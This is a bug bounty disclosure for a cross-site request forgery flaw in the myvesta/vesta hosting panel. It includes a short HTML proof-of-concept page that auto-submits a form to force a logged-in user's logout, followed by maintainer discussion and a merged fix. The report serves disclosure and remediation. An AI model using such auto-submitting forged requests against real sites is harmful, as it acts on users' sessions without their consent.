Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

Attacker is able to logout user if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser 2.you can check unintentionally you logged out

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

💥 Impact

This vulnerability is capable of forging admin or user to unintentional logout.

💥 Test

Tested on Edge, Firefox, chrome and safari.

📍 Location index.php#L3 📝 References csrf

Occurences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report
3 months ago
Musio modified their report
3 months ago
myvesta
3 months ago

Maintainer


I think this will not be fixed, because we use /logout/ on so many places on hosting panel, without passing the token. More over, to quote the guy from HestiaCP (that is also affected with this 'issue'): "If we require token, it will mean that if I don't have that token I can't logout any more" "There are no issues, it just reduces usability... the only thing that can be done is logout the user..."

However, we implemented CSRF protection on the top level, checking both HTTP_ORIGIN and HTTP_REFERER - https://github.com/myvesta/vesta/blob/5262b3f4470e7a937dccd3b9d537d6d1543bbca4/web/inc/secure_login.php#L53-L109

I will confirm this CSRF, but I'm not sure if this can be considered as a fix.

myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta
3 months ago

Maintainer


Looks like we are linking /logout/ only from 4 places. OK, we will add token there.

Musio
3 months ago

Researcher


Nice work, this may seems has a little impact but, as my friend says CSRF has impact when we can do an action on the database. in this situation attacker can invalidate user session therefore i report this kind issue every time i find.

and this is right that: "if i don't have token i must not can to logout."

myvesta confirmed that a fix has been merged on 9a746e 3 months ago
myvesta has been awarded the fix bounty